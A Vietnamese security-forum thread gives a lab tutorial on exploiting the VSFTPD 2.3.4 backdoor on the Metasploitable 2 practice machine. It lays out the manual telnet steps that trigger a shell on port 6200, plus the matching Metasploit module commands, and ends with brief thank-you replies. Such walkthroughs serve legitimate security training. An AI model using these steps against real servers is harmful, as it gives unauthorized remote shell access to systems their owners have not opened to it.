Hướng dẫn khai thác VSFTPD v2.3.4 trên Metasploitable 2

Thảo luận trong 'Exploitation' bắt đầu bởi NgMSon, 25/08/17, 08:08 PM.

  1. NgMSon

    NgMSon Well-Known Member

    Tham gia: 22/03/17, 10:03 AM
    Bài viết: 542
    Đã được thích: 721
    Điểm thành tích:
    93
    Để khai thác VSFTPD chúng ta có 2 cách như sau:
    + Khai thác bằng tay
    + Khai thác trên Metasloit
    I. Khai thác bằng tay.
    Ở đây chúng ta sẽ khai thác lỗ hổng backdoor theo cách thủ công bằng cách kết nối với dịch vụ VSFTPD Metasploitable 2 và sử dụng một hình ảnh cười như tên người dùng để xác thực.
    Sử dụng lệnh :
    Mã:
    telnet [Metasploitable IP] 21
    ( Trong đó Metasploit IP : IP / 21 : port - giữ nguyên )
    Sau khi nhập xong chúng ta tiếp tục với 2 câu lệnh
    Mã:
    USER user
    Mã:
    PASS pass
    * Chờ vài giây
    Khi chúng ta kích hoạt nmap và quét cổng 6200, chúng ta sẽ thấy mã độc hại đã được thực hiện
    [​IMG]
    Tiếp đó chúng ta kết nối với cổng 6200 bằng cách sử dụng lệnh sau:
    Mã:
    telnet [Metasploitable IP] 6200
    [​IMG]

    Video hướng dẫn.


    II. Khai thác trên Metasploit.
    Đâu tiên chúng ta mở msfconsole bằng lệnh sau:
    Mã:
    Msfconsole
    Khi msfconsole đang chạy chọn khai thác backdoor bằng cách sử dụng lệnh sau:
    Mã:
    use exploit/unix/ftp/vsftpd_234_backdoor
    Gõ lệnh sau để xem tùy chọn khai thác....
    Mã:
    Show options
    [​IMG]
    Như vậy chúng ta có thể thấy chúng ta chỉ cần cung cấp một IP host từ xa và một cổng mà chúng ta để mặc định trên cổng 21. Bây giờ chúng ta có thể gõ chạy hoặc khai thác để khai thác các mục tiêu.
    [​IMG]
    Video demo
     

    Các file đính kèm:

    Chỉnh sửa cuối: 25/08/17, 08:08 PM
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  2. NgMSon

    NgMSon Well-Known Member

    Tham gia: 22/03/17, 10:03 AM
    Bài viết: 542
    Đã được thích: 721
    Điểm thành tích:
    93
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
    GreenHatVN thích bài này.
  3. GreenHatVN

    GreenHatVN Member

    Tham gia: 22/07/17, 10:07 AM
    Bài viết: 16
    Đã được thích: 3
    Điểm thành tích:
    3
    Thanh you very much!
     
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  4. NgMSon

    NgMSon Well-Known Member

    Tham gia: 22/03/17, 10:03 AM
    Bài viết: 542
    Đã được thích: 721
    Điểm thành tích:
    93
    Mình sẽ còn đăng thêm nhiều bài viết nữa mong bạn quan tâm.
     
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan